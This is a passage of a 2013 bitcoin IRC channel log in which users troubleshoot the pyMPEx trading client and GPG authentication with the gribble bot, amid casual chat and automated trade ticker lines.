hand. Jan 27 07:53:46 is there any output after the warning lines? Jan 27 07:53:48 clearsign a stat, then encrypt it, then paste iti nto the site Jan 27 07:53:51 see what happens Jan 27 07:54:20 yeah smickles, it says "SyntaxError: invalid syntax" Jan 27 07:59:02 what is mpex retruning to you that causes a syntax error? Jan 27 08:00:17 'cause after that warning, there rest of the code is basically if reply == '': return none Jan 27 08:00:28 print reply Jan 27 08:00:56 doesn't it just work like: mpex.py "STAT" Jan 27 08:00:56 ? Jan 27 08:01:26 and maybe since you just re-installed, make sure that all is well with the mpex public key on the keyring... Jan 27 08:01:29 and it's not returning nothing b/c it would've printed "couldn't decode Jan 27 08:02:08 I've also tried https://github.com/ageis/MPEx-bin Jan 27 08:02:18 and I get further in the process, but still an error Jan 27 08:02:37 mpex-bin may have the old address coded in Jan 27 08:02:57 evoorhees mod6 has a point. are you signing with the right key ? Jan 27 08:02:59 evoorhees: did it work when you did it mannually? Jan 27 08:03:03 a different one might have been picked as tghe default Jan 27 08:03:13 when you reinstalled. Jan 27 08:03:15 mircea_popescu: it would've given a different error Jan 27 08:03:20 a ? ok then. Jan 27 08:03:26 I've tried signing with both of the email keys I use Jan 27 08:03:44 one min Jan 27 08:04:34 if all else fails email me a clearsigned STAT and i'll have it looked at from this end Jan 27 08:04:42 oh, the newer one has a logger Jan 27 08:06:39 evoorhees: try with the '-l' option Jan 27 08:06:43 er Jan 27 08:06:47 '-l -' Jan 27 08:06:57 dude paste a whole line lol. Jan 27 08:07:11 mircea I have no idea what you're talking about :) Jan 27 08:07:13 python -m mpex -l - STAT Jan 27 08:07:13 what's it, ./mpex.py "STAT" -l Jan 27 08:07:16 a ok Jan 27 08:07:24 will try that smickles, one min Jan 27 08:08:01 now... when I downloaded the "mpex.py" file, do I need to put it anywhere? Jan 27 08:08:28 https://bitcointalk.org/index.php?topic=138988.0 seems diceoncrack ddosed too Jan 27 08:08:40 I placed it in my python folder Jan 27 08:09:02 you can run it from that folder, or you can grab the setup file and install it Jan 27 08:09:04 [MPEX] [S.MPOE] 22558 @ 0.00066577 = 15.0184 BTC [-] Jan 27 08:09:05 [MPEX] [S.MPOE] 2090 @ 0.00066298 = 1.3856 BTC [-] Jan 27 08:09:41 prolly easier just to run it from the folder Jan 27 08:09:47 ;;ident evoorhees Jan 27 08:09:54 Nick 'evoorhees', with hostmask 'evoorhees!~evoorhees@ool-45738bde.dyn.optonline.net', is not identified. Jan 27 08:10:02 ./mpex.py -l - "STAT" Jan 27 08:10:13 no offense but i'd be careful about what information i'd give out Jan 27 08:10:16 at this point Jan 27 08:10:18 smickles: is it ./ on windows? Jan 27 08:10:19 jcpham is skeptical Jan 27 08:10:36 mod6: heh, prolly not Jan 27 08:10:53 jcpham what do you mean? Jan 27 08:10:58 jcpham seems mostly "how to use pympex" neh ? Jan 27 08:11:00 the windows part has me geeked out... I'm not even sure how to execute gpg on windows lol Jan 27 08:11:01 python mpex.py -l - "STAT" Jan 27 08:11:21 smickles do they use " or ' on win ? i recall jurov established the right one Jan 27 08:11:23 but i don't recall which Jan 27 08:11:38 okay diff problem now, one sec Jan 27 08:11:48 can't bloody copy text from the cmd prompt Jan 27 08:11:48 ugg, i dunno, I prefer an OS which allows either mircea_popescu Jan 27 08:12:02 i would say to also check that key ring to make sure that you see this keyid for mpex: 9214FC6BF1B69921 -- in unix its `gpg --list-keys --keyid-format=long` Jan 27 08:12:29 lol evoorhees sounds like he's in the middle of a real battle there. Jan 27 08:12:39 C:\Python27>python mpex.py -1-"STAT" Jan 27 08:12:41 Traceback (most recent call last): Jan 27 08:12:42 File "mpex.py", line 3, in Jan 27 08:12:44 import gnupg Jan 27 08:12:45 ImportError: No module named gnupg Jan 27 08:12:58 you need to install gnupg Jan 27 08:13:05 python-gnupg, iirc Jan 27 08:13:11 that'll help :) Jan 27 08:13:19 a! Jan 27 08:13:19 okay, one min Jan 27 08:13:31 jesus this -l stuff is nice. who came up with it ? Jan 27 08:13:37 i wouldn't want someone to be impersonating him Jan 27 08:13:47 nd you guys give him too much info somehow Jan 27 08:13:52 and allow it to get worse Jan 27 08:13:54 mircea_popescu: jurov funded by bugpowder iirc Jan 27 08:14:03 im the only one who could give too much info neh ? Jan 27 08:14:14 possibly Jan 27 08:14:16 depends Jan 27 08:14:19 jc's just a good watchdog :) Jan 27 08:14:26 jcpham gimme like an example ? Jan 27 08:14:28 'community advocate' Jan 27 08:14:28 impersonator could be gathering intel Jan 27 08:15:11 well now it fucking works Jan 27 08:15:12 well, the way things are going, it might be illegal to know how to use pympex, and this "evoorhees" is a fed :o Jan 27 08:15:20 It wasn't working with python 3.3 Jan 27 08:15:24 if i come in here one day asking questions and i'm not auth'd Jan 27 08:15:28 don't help me Jan 27 08:15:32 I uninstalled it, went back to 2.7, and then added gnupg Jan 27 08:15:54 jcpham but i mean tech questions ? why not ? public knowledge, or should be. Jan 27 08:15:54 I'm not sure if pympex is python3 compatible Jan 27 08:16:07 ow shit you know what, i think it's 2.x line Jan 27 08:16:10 iyou are right Jan 27 08:16:17 2.7 Jan 27 08:16:19 yeah.... see that's a problem if the link on the site takes you to python download page and 3.3 is at the top Jan 27 08:16:21 wd evoorhees Jan 27 08:16:33 FML Jan 27 08:16:35 and i guess this should be fixed, yeah. confuses ppls. Jan 27 08:16:52 lol Jan 27 08:17:05 gave a moment's pause there cause wtf, someone is signing as mpex wioth the wrong key ?! Jan 27 08:17:21 what sort of uber rootkit you'd have to have on your system for that 1... Jan 27 08:17:38 well let's say eric's pc is exploited and the people don't know how to use mpex Jan 27 08:17:48 and they want to cause havok Jan 27 08:17:56 but they don't have a clue what to do Jan 27 08:17:58 and so they stop by the irc chan and have a chat ? Jan 27 08:18:04 sure why not Jan 27 08:18:11 hey jcpham... how do I "authenticate"? Jan 27 08:18:17 so basically "what if erik is kidnapped by 6 buxom airheads" Jan 27 08:18:17 well, it's possible Jan 27 08:18:31 i'd guess... he wouldn't mind... so very much. Jan 27 08:18:39 ;;eauth identity Jan 27 08:18:39 Error: This nick is not registered. Please register. Jan 27 08:18:47 ;;everify response Jan 27 08:18:47 Error: Could not find a pending authentication request from your hostmask. Either it expired, or you changed hostmask, or you haven't made one. Jan 27 08:18:52 lol Jan 27 08:19:03 i think jcpham is actually being impersonated Jan 27 08:19:06 also ,,baa Jan 27 08:19:16 ,, is -otc only Jan 27 08:19:23 meh Jan 27 08:19:54 i'm just saying, i've seen him authenticate Jan 27 08:20:01 jcpham... how do I do it? Jan 27 08:20:08 yeah. evoorhees : you type in ;;eauth evoorhees Jan 27 08:20:12 the bot gives you a link Jan 27 08:20:18 ;;eauth evoorhees Jan 27 08:20:18 Request successful for user evoorhees, hostmask evoorhees!~evoorhees@ool-45738bde.dyn.optonline.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0272EF6FD370840C Jan 27 08:20:19 you then decrypt the contents of that link in gpg Jan 27 08:20:32 and then you go ;;everify Jan 27 08:21:02 ;;everify -----BEGIN PGP MESSAGE----- Jan 27 08:21:02 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Jan 27 08:21:04 hQEMA2r98eA5gHNkAQf9EM5TP/idfBexaM+7rOSFc14wlqtB06D+HwgKRAxDbBxQ Jan 27 08:21:06 fQCbVfwIqvs1D+EDd2WU3wWusGLzqUr8RPNwVKTR20yD43U8jHSHDgIWS+9UYYSh Jan 27 08:21:08 y8QbU933JftsTLrab6k+saCaWhYSVv+cKXE4TWrk/gF7TU6hBXYwOmsmALCw/sGE Jan 27 08:21:09 psyrM0FqdIzSNgnN104l5OUwBrBu2It5h7VETP6r2PeFeNFCTsZFViUYEd79fk9a Jan 27 08:21:11 1esQ5K3C1pFcqOderp4NmBeUWnOOaVsrnozCOkms9Aq97RoE4gZKkkbzZBz0Bl+6 Jan 27 08:21:12 ss2yCm5NfCDOEftngH+Ht0WxVR85xMik4Heg80YoPdKIAfISkZremhvmJVPrl2ql Jan 27 08:21:14 jlbLoz1JHBEmbASsS1q5KnNd+RixpMjnLj0tXbzudqOwMdSJcL27VyDNeiLbb0wm Jan 27 08:21:15 C0z8Pv/WBVMwh7MBBCZS0QMEd2cVnL6D+qFfwTUnD+XORSEsw3RPWRT8X7LhdHcZ Jan 27 08:21:17 elSjlp+xedJV5YhK4P2vF9cgdWW/GuQyCA== Jan 27 08:21:17 https://github.com/Azelphur/pyMPEx/pull/4 Jan 27 08:21:17 lolz mk. Jan 27 08:21:18 =h6/j Jan 27 08:21:20 -----END PGP MESSAGE----- Jan 27 08:21:27 you need to decrypt that message with GnuPG (gpg) Jan 27 08:21:28 decrypt it Jan 27 08:21:42 smickles any idea why pyumpex doesn't work in py 3.3 btw ? Jan 27 08:21:43 ;;everify the decrypted response string Jan 27 08:21:43 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Jan 27 08:21:47 lol this stuff is absurdly obtuse Jan 27 08:21:59 the decrypted message itself is the one time password to auth with gribble Jan 27 08:22:01 mircea_popescu: different syntax Jan 27 08:22:06 it's identity verification through public/private keys Jan 27 08:22:07 evoorhees: not in the least, actually. Jan 27 08:22:10 smickles so not really resolvable huh Jan 27 08:22:11 just like bitcoin Jan 27 08:22:17 ^^^^ Jan 27 08:22:23 no... bitcoin is just a bit complicated Jan 27 08:22:27 this is crazy shit here Jan 27 08:22:37 mircea_popescu: it is, actually, there are 2to3 scripts Jan 27 08:22:37 you can use bitcoin address to identify with gribble also Jan 27 08:22:39 you know that word keeps cropping up... somebody was calling me obtuse on my blog the other day Jan 27 08:22:40 same thing Jan 27 08:22:46 pub/private key Jan 27 08:23:00 [MPEX] [S.MPOE] 17400 @ 0.00066298 = 11.5359 BTC [-] Jan 27 08:23:01 gribble verifies your key, we're all on the up and up Jan 27 08:23:05 evoorhees: how did you auth before? Jan 27 08:23:17 yeah but you don't need to be pasting and calling up commands and going through fifteen steps to use bitcoin Jan 27 08:23:30 evoorhees depends. some people use bitcoind :D Jan 27 08:23:42 i have my auth scripted Jan 27 08:23:50 minus being prompted for a password Jan 27 08:23:56 *whew* Jan 27 08:24:01 see that sentence right there jcpham "i have my auth scripted"... wtf does that mean? Jan 27 08:24:02 ;;gpg info evoorhees Jan 27 08:24:02 User 'evoorhees', with keyid 0272EF6FD370840C, fingerprint 91A1C2DC46AF4B744EF9E0250272EF6FD370840C, and bitcoin address None, registered on Sat Aug 18 12:08:51 2012. http://bitcoin-otc.com/viewgpg.php?nick=evoorhees . Currently not authenticated. Jan 27 08:24:03 lol Jan 27 08:24:24 evoorhees he has a script that does the authing for yu. what you're doing now manually. Jan 27 08:24:26 it means he has a program do it for him Jan 27 08:24:27 i don't mean to be a dick, i really don't Jan 27 08:24:30 like pympex is a script for mpex Jan 27 08:24:40 i'd hate to see some one impersoante you Jan 27 08:24:50 that's true, could be a pretty big hole. Jan 27 08:24:56 yes Jan 27 08:25:01 hmmm.. pic with shoe on head? Jan 27 08:25:07 evoorhees so how you doing on the decrypt ? Jan 27 08:25:15 you just start gpg and paste the content of gribble's link in there Jan 27 08:25:23 [BTCTC] [COGNITIVE] 2 @ 0.3004 = 0.6008 BTC [-] Jan 27 08:25:33 how did he get this thing registered, if he can't auth now? Jan 27 08:25:34 meanwhile, "Sacred Ritual class next weekend in Portland, accepting bitcoin" Jan 27 08:25:41 /¯(°_o)/¯ Jan 27 08:25:45 I mean... all this stuff, how it works now, is great for hackers and tech people, but unfortunately the world will not be using privacy and ITsec when they work like this Jan 27 08:26:06 smickles i think he did it the normal way but meanwhile lost the hang of it Jan 27 08:26:06 maybe it's good that the avg govt worker doesn't know how to use this stuff Jan 27 08:26:16 i feel trolled Jan 27 08:26:21 i'm leaving Jan 27 08:26:37 ya know, an iPhone app could be written to do all this for people Jan 27 08:26:51 and keep your keys on dropbox Jan 27 08:26:56 it'd be trendy Jan 27 08:26:57 and what is that iphone app's writer waiting for ? Jan 27 08:27:17 well, i have an mpex for android Jan 27 08:27:20 once mod6 figures out how to store keys safely and gets iphone mpex tool Jan 27 08:27:26 i imagine it'll be a little boom Jan 27 08:27:39 im getting there :) Jan 27 08:27:46 speaking of which, how's it going ? xmas is here soon... :D Jan 27 08:27:55 lol Jan 27 08:28:17 mircea I'm confused... pming you Jan 27 08:28:21 mircea_popescu: actualy, that short story I wrote Jan 27 08:28:22 ikr... man, workin constantly doing this other stuff. but trying to wrap that stuff up so I can work on bitotter more Jan 27 08:28:53 involved just such a program to make it easy to gpg, contract, bitcoin, all that as verbs Jan 27 08:29:07 "RegniCoin" Jan 27 08:29:18 smickles: apple is well, what it is i guess. but they pulled their bitcoin related apps didn't they?! Jan 27 08:29:30 makomk malaimo markedathome maximian midnightmagic mircea_popescu mod6 Jan 27 08:29:32 ;;ident mircea_popescu Jan 27 08:29:32 this past year Jan 27 08:29:32 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. Jan 27 08:29:36 ;;eauth mircea_popescu Jan 27 08:29:37 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jan 27 08:29:43 so piss on apple until they get with the program Jan 27 08:30:05 ;;everify freenode:#bitcoin-otc:003377ad48763577a9ee8486e79ff52d5114852b7abc858643b8167b Jan 27 08:30:05 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Jan 27 08:30:09 gah Jan 27 08:30:10 thats why android first :) Jan 27 08:30:18 contracts were as easy as speaking "I agree to send 1 btc to the indicated address in exchange for a ride to wal-mart" to your phone Jan 27 08:30:19 ;;everify freenode:#bitcoin-otc:003377ad48763577a9ee8486e79ff52d5114852b7abc858643b8167b Jan 27 08:30:20 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jan 27 08:30:23 ;;ident mircea_popescu Jan 27 08:30:23 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is identified as user mircea_popescu, with GPG key id 8A736F0E2FB7B452, key fingerprint 6160E1CAC8A3C52966FD76998A736F0E2FB7B452, and bitcoin address None Jan 27 08:30:28 ;;ident mod6 Jan 27 08:30:29 Nick 'mod6', with hostmask 'mod6!fb699aa74e@rider.us', is identified as user mod6, with GPG key id D655A630A13E8C69, key fingerprint AD7EA6BB386273FCAA5AE7ABD655A630A13E8C69, and bitcoin address None Jan 27 08:30:36 wewt Jan 27 08:31:08 the program would fill in the address based on your contacts list, Jan 27 08:31:16 the whole 9 yards basically Jan 27 08:31:33 pretty cool. Jan 27 08:31:38 fool proof, unless you had your phone stolen w/o any lockscreen security Jan 27 08:32:04 i think they're gonna start making selfdestruct phones Jan 27 08:32:12 if i were running apple that's what i'd do. Jan 27 08:32:13 don't need to Jan 27 08:32:29 phone identifies your touch, if tyouched by anyone else it explodes. Jan 27 08:32:31 apple is encrypted to the point that it doesn't matter if you password it Jan 27 08:32:39 just for the hell of it. Jan 27 08:32:47 ;;eauth lautaro Jan 27 08:32:47 Error: This nick is not registered. Please register. Jan 27 08:33:05 well, just for the hell of it, i'd have it shoot razorwire out ot their eyes Jan 27 08:33:13 :D Jan 27 08:33:23 be like "here you go, a phone for you" Jan 27 08:33:25 BOOM Jan 27 08:34:25 the first place where I lived on my own, I setup razorwire traps on the inside of all entrances. an unauthorized person would have 3 lengths of razorwire wrapped around them Jan 27 08:34:34 those were fun to build Jan 27 08:34:45 maniac. Jan 27 08:34:54 simple too. cinderblock, razorwire, rope, pully Jan 27 08:34:54 i'd have had a buncha hurt womenz on my hands ;/ Jan 27 08:35:19 [MPEX] [S.DICE] 600 @ 0.00735041 = 4.4102 BTC [-] Jan 27 08:35:41 that's some kinda security, be glad you didn't have a fire and have to use the window ;) Jan 27 08:35:44 mircea_popescu: this was at a time when i liven in a place where the police had a tendancy to raid 'the wrong house' Jan 27 08:36:11 a. police here is nice, basically. Jan 27 08:36:13 mod6: actually, going out wouldn't set it off Jan 27 08:36:46 haha nice Jan 27 08:37:16 and the tucson police are awesome, I don't hardly ever see them, so i think there arn't many of them 'per capita'. Jan 27 08:37:27 there used to be Jan 27 08:37:29 lol Jan 27 08:37:39 but the tpd never fucked with me too hard Jan 27 08:37:52 but the county boys were always giving me a run for my money Jan 27 08:37:55 i'm told that the low crime in my area is unrelated to the low amt of police Jan 27 08:38:22 mod6: might just be my neighborhood Jan 27 08:38:49 tucson is really just patchy like that. some spots awesome, some spots not quite as awesome Jan 27 08:43:15 i gotta take a vacation one of these days and go see my friends down there Jan 27 08:43:31 [MPEX] [S.MPOE] 3319 @ 0.00066298 = 2.2004 BTC [-] Jan 27 08:43:33 [MPEX] [S.MPOE] 22881 @ 0.00066287 = 15.1671 BTC [-] Jan 27 08:44:50 i miss the weather and the sunsets. :P Jan 27 08:45:08 minneapolis is like an icebox Jan 27 08:46:52 [MPEX] [S.MPOE] 3321 @ 0.00066287 = 2.2014 BTC [-] Jan 27 08:46:53 [MPEX] [S.MPOE] 18800 @ 0.00066281 = 12.4608 BTC [-] Jan 27 08:46:55 [MPEX] [S.MPOE] 10000 @ 0.0006627 = 6.627 BTC [-] Jan 27 08:46:56 [MPEX] [S.MPOE] 1929 @ 0.00066269 = 1.2783 BTC [-] Jan 27 08:51:39 hmmmm Jan 27 08:52:07 jcpham: you can't ever be too paranoid Jan 27 08:52:29 its good to watch this kinda stuff Jan 27 08:53:19 fo sho Jan 27 08:53:41 did he ever get auth'd? Jan 27 08:54:55 with gribble ? nope Jan 27 08:55:21 oh.. hmm. *shrug* Jan 27 08:57:54 smickles: have you been up to flagstaff yet? Jan 27 08:59:19 seems seals with clubs got dosed too Jan 27 09:04:00 [MPEX] [S.MPOE] 11424 @ 0.0006668 = 7.6175 BTC [+] Jan 27 09:14:08 ;;tslb Jan 27 09:14:10 Time since last block: 5 minutes and 2 seconds Jan 27 09:14:36 [MPEX] [S.MPOE] 17400 @ 0.00066631 = 11.5938 BTC [-] Jan 27 09:18:51 well, i suppose i better try to finish up that aws stuff. i'll bbs :) Jan 27 09:35:18 [MPEX] [S.MPOE] 20550 @ 0.0006668 = 13.7027 BTC [+] Jan 27 09:45:41 [MPEX] [S.MPOE] 4500 @ 0.00066631 = 2.9984 BTC [-] Jan 27 09:45:43 [MPEX] [S.MPOE] 15750 @ 0.00066269 = 10.4374 BTC [-] Jan 27 09:48:21 [MPEX] [S.MPOE] 2521 @ 0.00066269 = 1.6706 BTC [-] Jan 27 09:48:22 [MPEX] [S.MPOE] 19979 @ 0.0006622 = 13.2301 BTC [-] Jan 27 09:51:29 http://www.theblaze.com/stories/2013/01/26/former-brain-dead-liberal-filmmaker-pens-scathing-column-on-gun-control-a-political-appeal-to-the-ignorant/ Jan 27 09:51:51 [MPEX] [S.DICE] 250 @ 0.00735041 = 1.8376 BTC [-] Jan 27 09:54:49 [MPEX] [S.MPOE] 3276 @ 0.0006668 = 2.1844 BTC [+] Jan 27 09:54:50 [MPEX] [S.MPOE] 9092 @ 0.00066762 = 6.07 BTC [+] Jan 27 09:57:06 [MPEX] [S.MPOE] 22750 @ 0.0006622 = 15.0651 BTC [-] Jan 27 10:16:58 [MPEX] [S.MPOE] 10227 @ 0.0006622 = 6.7723 BTC [-] Jan 27 10:17:00 [MPEX] [S.MPOE] 3173 @ 0.00066179 = 2.0999 BTC [-] Jan 27 10:52:47 [MPEX] [S.MPOE] 23926 @ 0.00066516 = 15.9146 BTC [+] Jan 27 10:52:49 [MPEX] [S.MPOE] 16919 @ 0.00066392 = 11.2329 BTC [-] Jan 27 10:52:50 [MPEX] [S.MPOE] 7127 @ 0.00066179 = 4.7166 BTC [-] Jan 27 10:52:52 [MPEX] [S.MPOE] 23500 @ 0.00066135 = 15.5417 BTC [-] Jan 27 10:52:53 [MPEX] [S.MPOE] 77880 @ 0.00066059 = 51.4467 BTC [-] Jan 27 10:52:54 [MPEX] [S.MPOE] 2088 @ 0.00066033 = 1.3788 BTC [-] Jan 27 11:00:18 [MPEX] [S.MPOE] 2800 @ 0.00066621 = 1.8654 BTC [+] Jan 27 11:06:39 [MPEX] [S.DICE] 2300 @ 0.00738484 = 16.9851 BTC [+] Jan 27 11:18:26 [MPEX] [S.MPOE] 14912 @ 0.00066033 = 9.8468 BTC [-] Jan 27 11:18:27 [MPEX] [S.MPOE] 9888 @ 0.0006582 = 6.5083 BTC [-] Jan 27 11:21:10 [HAVELOCK] [KCIM] 5 @ 0.989 = 4.945 BTC [-] Jan 27 11:23:51 [MPEX] [S.MPOE] 41793 @ 0.0006582 = 27.5082 BTC [-] Jan 27 11:27:06 [MPEX] [S.MPOE] 20100 @ 0.0006582 = 13.2298 BTC [-] Jan 27 11:37:53 [MPEX] [S.MPOE] 13800 @ 0.0006582 = 9.0832 BTC [-] Jan 27 11:45:32 smickles, mpex.py -l - DISABLES logging. read teh help... Jan 27 11:45:40 oh hes not here Jan 27 11:46:33 [MPEX] [S.MPOE] 779 @ 0.00066621 = 0.519 BTC [+] Jan 27 11:46:34 [MPEX] [S.MPOE] 8008 @ 0.00066762 = 5.3463 BTC [+] Jan 27 11:46:36 [MPEX] [S.MPOE] 25163 @ 0.00066794 = 16.8074 BTC [+] Jan 27 11:52:58 [MPEX] [S.MPOE] 3937 @ 0.00066794 = 2.6297 BTC [+] Jan 27 11:53:00 [MPEX] [S.MPOE] 4015 @ 0.0006681 = 2.6824 BTC [+] Jan 27 12:00:01 [MPEX] [S.MPOE] 5685 @ 0.0006681 = 3.7981 BTC [+] Jan 27 12:00:03 [MPEX] [S.MPOE] 8700 @ 0.00066822 = 5.8135 BTC [+] Jan 27 12:00:04 [MPEX] [S.MPOE] 15615 @ 0.00066836 = 10.4364 BTC [+] Jan 27 12:12:14 [MPEX] [S.MPOE] 14555 @ 0.00066005 = 9.607 BTC [-] Jan 27 12:16:48 [MPEX] [S.MPOE] 13975 @ 0.00066836 = 9.3403 BTC [+] Jan 27 12:23:04 [MPEX] [S.MPOE] 900 @ 0.00066836 = 0.6015 BTC [+] Jan 27 12:23:26 lol Jan 27 12:23:34 jurov oddly seems to have worked ? or i dunno. Jan 27 12:24:15 yes, it works as usual it just won't output anything to log file if you pass -l - Jan 27 12:24:35 if you don't pass -l parameter it logs to ./mpex.log Jan 27 12:26:18 [MPEX] [S.MPOE] 3145 @ 0.00066775 = 2.1001 BTC [-] Jan 27 12:26:29 i c. Jan 27 12:26:37 any other value is considered log path/filename to be used instead of mpex.log Jan 27 12:34:41 [MPEX] [S.MPOE] 16340 @ 0.00066743 = 10.9058 BTC [-] Jan 27 12:48:35 [MPEX] [S.MPOE] 17400 @ 0.00066743 = 11.6133 BTC [-] Jan 27 12:55:29 [MPEX] [S.MPOE] 4550 @ 0.00066305 = 3.0169 BTC [-] Jan 27 13:00:08 [HAVELOCK] [SDICE] 2 @ 0.8 = 1.6 BTC [+] Jan 27 13:00:27 !ticker m s.dice Jan 27 13:00:29 [MPEX:S.DICE] 1D: 0.0064388 / 0.00723965 / 0.0075 (188520 shares, 1,364.82 BTC), 7D: 0.00085848 / 0.00500419 / 0.0075 (1115361 shares, 5,581.48 BTC), 30D: 0.00085848 / 0.00424022 / 0.0075 (10461746 shares, 44,360.19 BTC) Jan 27 13:00:33 .8 eh Jan 27 13:03:35 [MPEX] [S.MPOE] 8819 @ 0.0006582 = 5.8047 BTC [-] Jan 27 13:03:37 [MPEX] [S.MPOE] 14250 @ 0.00065675 = 9.3587 BTC [-] Jan 27 13:03:39 [MPEX] [S.MPOE] 5931 @ 0.00065616 = 3.8917 BTC [-] Jan 27 13:10:29 http://i.minus.com/ipcfdyRde5WcI.gif Jan 27 13:12:19 [MPEX] [S.DICE] 50 @ 0.00738484 = 0.3692 BTC [+] Jan 27 13:12:21 [MPEX] [S.DICE] 1550 @ 0.00738465 = 11.4462 BTC [-] Jan 27 13:12:22 [MPEX] [S.DICE] 1050 @ 0.007323 = 7.6892 BTC [-] Jan 27 13:15:12 [MPEX] [S.MPOE] 8019 @ 0.00065616 = 5.2617 BTC [-] Jan 27 13:15:14 [MPEX] [S.MPOE] 13400 @ 0.00065588 = 8.7888 BTC [-] Jan 27 13:15:15 [MPEX] [S.MPOE] 20450 @ 0.00065586 = 13.4123 BTC [-] Jan 27 13:15:17 [MPEX] [S.MPOE] 2281 @ 0.00065558 = 1.4954 BTC [-] Jan 27 13:17:46 [MPEX] [S.DICE] 3800 @ 0.00745 = 28.31 BTC [+] Jan 27 13:44:10 ;;ident bitcoin5411 Jan 27 13:44:10 Nick 'bitcoin5411', with hostmask 'bitcoin5411!~bitcoin54@190.244.81.62', is not identified. Jan 27 13:44:33 ;;gettrust bitcoin5411 Jan 27 13:44:34 Trust relationship from user mircea_popescu to user bitcoin5411: Level 1: 0, Level 2: 1 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=bitcoin5411 Jan 27 13:52:10 [MPEX] [S.DICE] 7 @ 0.00729616 = 0.0511 BTC [-] Jan 27 13:52:12 [MPEX] [S.DICE] 80 @ 0.00725542 = 0.5804 BTC [-] Jan 27 13:52:13 [MPEX] [S.DICE] 1513 @ 0.00725541 = 10.9774 BTC [-] Jan 27 13:56:30 [MPEX] [S.DICE] 79 @ 0.00725541 = 0.5732 BTC [-] Jan 27 13:56:32 [MPEX] [S.DICE] 2122 @ 0.00723577 = 15.3543 BTC [-] Jan 27 13:56:33 [MPEX] [S.DICE] 149 @ 0.00722182 = 1.0761 BTC [-] Jan 27 13:57:16 [MPEX] [S.MPOE] 9341 @ 0.00065596 = 6.1273 BTC [+] Jan 27 13:57:18 [MPEX] [S.MPOE] 7759 @ 0.00065704 = 5.098 BTC [+] Jan 27 14:06:01 [MPEX] [S.MPOE] 16100 @ 0.00065558 = 10.5548 BTC [-] Jan 27 14:08:04 [BTCTC] [B.YABMC] 1 @ 0.0569 BTC [-] Jan 27 14:08:17 [BTCTC] [B.YABMC] 1 @ 0.057 BTC [+] Jan 27 14:39:21 [MPEX] [S.MPOE] 11826 @ 0.00065704 = 7.7702 BTC [+] Jan 27 14:39:23 [MPEX] [S.MPOE] 21700 @ 0.0006593 = 14.3068 BTC [+] Jan 27 14:39:24 [MPEX] [S.MPOE] 5470 @ 0.00066305 = 3.6269 BTC [+] Jan 27 14:47:23 [MPEX] [S.MPOE] 4850 @ 0.00066305 = 3.2158 BTC [+] Jan 27 14:57:38 [MPEX] [S.MPOE] 661 @ 0.00066305 = 0.4383 BTC [+] Jan 27 14:57:39 [MPEX] [S.MPOE] 15239 @ 0.00066636 = 10.1547 BTC [+] Jan 27 15:05:25 [MPEX] [S.MPOE] 16850 @ 0.00065587 = 11.0514 BTC [-] Jan 27 15:05:26 [MPEX] [S.MPOE] 10319 @ 0.00065558 = 6.7649 BTC [-] Jan 27 15:05:27 [MPEX] [S.MPOE] 1181 @ 0.00065493 = 0.7735 BTC [-] Jan 27 15:15:21 [MPEX] [S.BBET] 18000 @ 0.001139 = 20.502 BTC [-] Jan 27 15:23:17 [MPEX] [S.MPOE] 16000 @ 0.00065703 = 10.5125 BTC [+] Jan 27 15:23:19 [MPEX] [S.MPOE] 5950 @ 0.00066033 = 3.929 BTC [+] Jan 27 15:27:47 [MPEX] [S.MPOE] 9050 @ 0.00066033 = 5.976 BTC [+] Jan 27 15:27:49 [MPEX] [S.MPOE] 4511 @ 0.00066636 = 3.0059 BTC [+] Jan 27 15:27:50 [MPEX] [S.MPOE] 5339 @ 0.00066679 = 3.56 BTC [+] Jan 27 15:34:16 [MPEX] [S.MPOE] 561 @ 0.00066679 = 0.3741 BTC [+] Jan 27 15:34:17 [MPEX] [S.MPOE] 5255 @ 0.00066743 = 3.5073 BTC [+] Jan 27 15:35:04 http://www.amazon.com/dp/160530641X/?tag=codihorr-20 Jan 27 15:40:06 [MPEX] [S.MPOE] 1900 @ 0.00066465 = 1.2628 BTC [-] Jan 27 15:40:08 [MPEX] [S.MPOE] 10486 @ 0.00065544 = 6.8729 BTC [-] Jan 27 15:41:08 kakobrekla congratulations! boy or girl ? Jan 27 15:41:15 lol Jan 27 15:41:30 i wish that does not happen yet Jan 27 15:41:34 lol Jan 27 15:41:39 or ever. Jan 27 15:42:30 i have two brothers, ~22 and ~21 years younger than me Jan 27 15:42:40 could just have them Jan 27 15:42:44 haha wow. Jan 27 15:42:44 instead of my kids Jan 27 15:50:57 [MPEX] [S.MPOE] 11181 @ 0.00066038 = 7.3837 BTC [+] Jan 27 15:56:12 [BTCTC] [COGNITIVE] 4 @ 0.3004 = 1.2016 BTC [-] Jan 27 15:56:14 [BTCTC] [COGNITIVE] 2 @ 0.3004 = 0.6008 BTC [-] Jan 27 15:56:16 [BTCTC] [COGNITIVE] 11 @ 0.3003 = 3.3033 BTC [-] Jan 27 15:56:17 [BTCTC] [COGNITIVE] 5 @ 0.3 = 1.5 BTC [-] Jan 27 15:56:18 [BTCTC] [COGNITIVE] 10 @ 0.3 = 3 BTC [-] Jan 27 15:58:01 [BTCTC] [LTC-MINING] 1 @ 0.3501 BTC [+] Jan 27 16:02:05 [MPEX] [S.MPOE] 3258 @ 0.00066038 = 2.1515 BTC [+] Jan 27 16:02:05 [MPEX] [S.MPOE] 5614 @ 0.00065544 = 3.6796 BTC [-] Jan 27 16:02:07 [MPEX] [S.MPOE] 619 @ 0.00065493 = 0.4054 BTC [-] Jan 27 16:02:08 [MPEX] [S.MPOE] 6418 @ 0.00065437 = 4.1997 BTC [-] Jan 27 